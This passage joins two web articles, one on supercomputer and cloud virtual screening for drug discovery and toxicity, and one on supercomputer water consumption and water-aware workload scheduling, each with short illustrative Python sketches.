But not necessarily an actual supercomputer. Compute clouds have turned out to be very suitable for this type of embarrassingly parallel application. For example, in a recent test with 50,000 cores on Amazon's cloud (provisioned by Cycle Computing), software was able to screen 21 million compounds against a protein target in less than three hours.
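Because each compound can be docked and scored independently, the screening loop parallelizes almost trivially. The sketch below fans a compound library out over local cores with Python's multiprocessing module; dock_score is a hypothetical placeholder that fabricates affinities from a hash so the example runs end to end, where a real wrapper would launch a docking engine such as AutoDock, and the threshold is purely illustrative.

from multiprocessing import Pool
import hashlib

def dock_score(compound_id: str) -> float:
    # Hypothetical stand-in for a real docking engine: derives a fake "binding
    # affinity" from the compound id so the sketch runs without real docking.
    digest = hashlib.md5(compound_id.encode()).digest()
    return -12.0 + (digest[0] / 255.0) * 8.0  # fake scores in the -12..-4 range

def screen_library(compound_ids, workers=8, keep_threshold=-9.0):
    # Each docking run is independent of the others, so the library can be
    # split across however many cores (or cloud nodes) are available.
    with Pool(processes=workers) as pool:
        scores = pool.map(dock_score, compound_ids)
    # Keep only the strongest predicted binders for follow-up with more
    # expensive, higher-fidelity molecular dynamics codes.
    return [(cid, s) for cid, s in zip(compound_ids, scores) if s <= keep_threshold]

if __name__ == "__main__":
    hits = screen_library([f"CHEM-{i}" for i in range(10_000)])
    print(f"{len(hits)} candidate binders kept")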
Real supercomputers work too. At Oak Ridge National Lab (ORNL), researchers used 50,000 cores of Jaguar to screen about 10 million drug candidates in less than a day. Jeremy C. Smith, director of the Center for Molecular Biophysics at ORNL, believes this type of virtual screening is the most cost-effective approach to turbo-charge the drug pipeline. But the real utility of the supercomputing approach, says Smith, is that it can also be used to screen out drugs with toxic side effects.
Toxicity is often hard to detect until it comes time to do clinical trials, the most expensive and time-consuming phase of drug development. Worse yet, sometimes toxicity is not discovered until after the drug has been approved and released into the wild. So identifying these compounds early has the potential to save lots of money, not to mention lives. As Smith says, “If drug candidates are going to fail, you want them to fail fast, fail cheap.”
At the molecular level, toxicity is caused by a drug binding to the wrong protein, one that is actually needed by the body, rather than just selectively binding to the protein causing the condition. The problem is that the human body contains many thousands of different proteins, so every potential compound needs to be checked against each one. When you're working with millions of drug candidates, the job becomes overwhelming, even for the petaflop supercomputers of today. To tackle the toxicity problem at full scale, you'll need an exascale machine, says Smith.
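Conceptually, the toxicity screen just adds a second dimension to the docking loop: instead of one target, each surviving candidate is scored against a panel of off-target human proteins and discarded if it binds any of them too strongly. The sketch below illustrates that filter; as in the earlier example, dock_score is a hypothetical stand-in (here taking both a compound and a protein) and the threshold and panel size are arbitrary illustrative values.

import hashlib

def dock_score(compound_id: str, protein_id: str) -> float:
    # Hypothetical stand-in for scoring one compound against one protein;
    # fake affinities let the sketch run without a real docking engine.
    digest = hashlib.md5(f"{compound_id}:{protein_id}".encode()).digest()
    return -12.0 + (digest[0] / 255.0) * 8.0

def likely_toxic(compound_id, off_target_proteins, bind_threshold=-11.0):
    # A candidate is flagged if it binds strongly to any protein the body
    # actually needs, not just to the disease-causing target.
    return any(
        dock_score(compound_id, protein) <= bind_threshold
        for protein in off_target_proteins
    )

def filter_for_safety(candidate_ids, off_target_proteins):
    # candidates x off-target proteins: this product is what pushes the
    # workload toward exascale when candidates number in the millions.
    return [c for c in candidate_ids if not likely_toxic(c, off_target_proteins)]

if __name__ == "__main__":
    safe = filter_for_safety([f"CHEM-{i}" for i in range(100)],
                             off_target_proteins=[f"PROT-{j}" for j in range(5)])
    print(f"{len(safe)} candidates pass the off-target screen")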
Besides screening for toxicity, the same exascale setup can be used to repurpose existing drugs for other medical conditions. That is, the docking software could use approved drugs as the starting point and try to match them against various target proteins known to cause disease. Right now, repurposing opportunities are typically discovered on a trial-and-error basis, but the increasing number of compounds in this multiple-use category suggests this could be a rich new area of drug discovery.
In any case, sheer compute power is not the complete answer. For starters, the software has to be scaled up to the level of the hardware, and on an exascale machine, that hardware is more than likely going to be based on heterogeneous processors. But since the problem is easily parallelized (each docking operation can be performed independently of the others), at least the scaling aspect should be relatively easy to overcome.
The larger problem is that the molecular modeling software itself is imperfect. Unlike a true lock and key, proteins are dynamic structures, and the action of binding to a molecule changes their shape. Therefore, physics simulation is also required to get a more precise match.
AutoDock, for example, is only able to provide a crude match between drug and protein. To get higher-fidelity docking, more compute-intensive algorithms are required. Researchers, like those at ORNL, often resort to more precise molecular dynamics codes after performing a crude screening run with AutoDock.
None of this is a guarantee that virtual docking on exascale machines is going to launch a golden age of drugs. It's possible that researchers will discover that there are just a handful of small-molecule compounds that are both effective against disease and non-toxic. But Smith believes this approach is full of promise. "This is the way to design drugs since this mirrors the way nature works," he says.
| <urn:uuid:4d656fbb-923f-4889-90af-53ce9894af81> | CC-MAIN-2022-40 | https://www.hpcwire.com/2012/07/31/drug_discovery_looks_for_its_next_fix/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030331677.90/warc/CC-MAIN-20220924151538-20220924181538-00342.warc.gz | en | 0.95818 | 1,259 | 3.03125 | 3 |
Water scarcity has surfaced as a critical issue in the U.S. and around the globe. A McKinsey-led report shows that, by 2030, global water demand is expected to exceed supply by 40%. According to another report, by the Congressional Research Service (CRS), more than 70% of the land area in the U.S. was under drought conditions during August 2012.
By 2014, conditions had become even worse in some states: following a three-year dry period, California declared a statewide drought emergency. An NBC News report on the drought quotes California Gov. Jerry Brown calling it "perhaps the worst drought California has ever seen since records began being kept about 100 years ago". Such evidence of extended droughts and water scarcity has made concerted approaches to tackling the crisis and ensuring water sustainability a necessity.
Supercomputers are notorious for consuming a significant amount of electricity, but a lesser-known fact is that they are also extremely "thirsty," consuming huge amounts of water to cool servers through cooling towers typically located on the roof of the facility. While high-density servers packed into a supercomputer center can save space and/or cost, they also generate a large amount of heat which, if not properly removed, can damage the equipment and result in huge economic losses.
Its high heat capacity makes water an ideal and energy-efficient medium for rejecting server heat into the environment through evaporation, an old yet effective cooling mechanism. According to Amazon's James Hamilton, a 15 MW data center could guzzle up to 360,000 gallons of water per day. The U.S. National Security Agency's data center in Utah would require up to 1.7 million gallons of water per day, enough to meet the water needs of more than 10,000 households.
Although water consumption is related to energy consumption, the two are not the same: because water efficiency varies over time with outside temperature, the same amount of server energy consumed at different times can evaporate different amounts of water in the cooling towers. Beyond the onsite cooling towers, supercomputers' enormous appetite for electricity also makes them responsible for offsite water consumption embedded in electricity production. In fact, electricity production accounts for the largest water withdrawal of any sector in the U.S. While not all of that withdrawal is consumed, or "lost," via evaporation, the national average water consumption for a single kWh of electricity still reaches 1.8 L, even excluding hydropower, which is itself a huge water consumer.
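To make the onsite/offsite split concrete, a rough back-of-the-envelope calculation using the figures quoted above, and assuming the 15 MW facility runs at full load around the clock, looks like this:

# Rough illustration only: offsite water embedded in a 15 MW facility's electricity.
power_mw = 15.0
kwh_per_day = power_mw * 1000 * 24        # 360,000 kWh per day at full load
offsite_l_per_day = kwh_per_day * 1.8     # 1.8 L/kWh national average -> 648,000 L per day
offsite_gal_per_day = offsite_l_per_day / 3.785

print(f"~{offsite_gal_per_day:,.0f} gallons/day offsite")
# Roughly 171,000 gallons per day of offsite water consumption, on top of the
# ~360,000 gallons/day that can evaporate in the onsite cooling towers.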
Amid concerns over the tremendous amount of water required to run data centers and supercomputers, there has been increasing interest in mitigating water consumption. For example, Facebook and eBay have built dashboards to monitor water efficiency (Water Usage Effectiveness, or WUE) at run time, while Google and the NCAR-Wyoming Supercomputing Center (NWSC) are developing water-efficient cooling technologies such as outside-air cooling and the use of recycled water. These approaches, however, target only facility or infrastructure improvements, and they require high upfront capital investment and/or suitable climate conditions.
Why should supercomputer operators care about water consumption? There are a good number of reasons. Water conservation not only earns tax credits and trims annual utility bills, it also improves the sustainability of supercomputers and helps them survive the extended droughts that are increasingly frequent in water-stressed areas such as California, where many large data centers and supercomputers are located. Water conservation also helps facilities acquire green certification and fulfill their social responsibilities.
Motivated by the dearth of thorough research into supercomputer water efficiency and the urgency of water conservation, a group of researchers at Florida International University has recently been working on data center and supercomputer water conservation. Unlike current water-saving approaches, which primarily focus on improved "engineering" and exhibit several limitations (such as high upfront capital investment and dependence on a suitable climate), the group devises software-based approaches that mitigate water consumption by exploiting the inherent spatio-temporal variation of water efficiency. That variation comes from nature for free: volatile temperatures produce time-varying water efficiency, while heterogeneous supercomputer systems across different locations produce spatial variation.
The research group finds that this spatio-temporal variation is a natural fit for supercomputers' workload flexibility: workloads can be migrated to locations with higher water efficiency and/or deferred to water-efficient times. The approach has been demonstrated in extensive experimental studies, reducing water consumption by 20% with almost no compromise in other respects, such as service latency. These promising results mark a first step toward supercomputer sustainability through water conservation, without upfront capital investment or facility upgrades.
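As a simplified illustration of the deferral side of that idea, the sketch below assigns deferrable batch jobs to the hours with the lowest forecast water usage effectiveness before their deadlines. The hourly WUE curve, job names, deadlines and capacity figure are all hypothetical; a real scheduler would also weigh energy price, latency and migration cost.

# Toy water-aware scheduler: place each deferrable job in the remaining
# hour with the best (lowest) forecast WUE before its deadline.
wue_forecast = {h: 0.2 + 0.15 * abs(12 - h) / 12 for h in range(24)}  # hypothetical daily WUE curve

jobs = [
    {"name": "nightly-etl", "deadline_hour": 23},
    {"name": "md-batch", "deadline_hour": 18},
]  # hypothetical deferrable workloads

capacity_per_hour = 1  # illustrative: how many such jobs fit in one hour
load = {h: 0 for h in range(24)}
schedule = {}

for job in sorted(jobs, key=lambda j: j["deadline_hour"]):
    candidate_hours = [
        h for h in range(job["deadline_hour"] + 1)
        if load[h] < capacity_per_hour
    ]
    best_hour = min(candidate_hours, key=lambda h: wue_forecast[h])
    schedule[job["name"]] = best_hour
    load[best_hour] += 1

print(schedule)  # e.g. {'md-batch': 12, 'nightly-etl': 11}: the hours with the lowest forecast WUE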
If you operate a supercomputer in a water-stressed area undergoing drought, this software-based approach may help it survive without costing a single cent on facility upgrades.
Shaolei Ren received his Ph.D. from the University of California, Los Angeles, in 2012 and is currently an Assistant Professor at Florida International University, where he leads research teams working on the issues described above. His research focuses on sustainable computing. He has written about sustainable HPC datacenters in the past, including a featured selection for our "SC Research Highlights" from 2013, which can be found here.
| <urn:uuid:790ce9d6-9936-410c-9187-7fba4bc4537e> | CC-MAIN-2022-40 | https://www.hpcwire.com/2014/01/26/can-supercomputers-survive-drought/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030331677.90/warc/CC-MAIN-20220924151538-20220924181538-00342.warc.gz | en | 0.952023 | 1,200 | 3.6875 | 4 |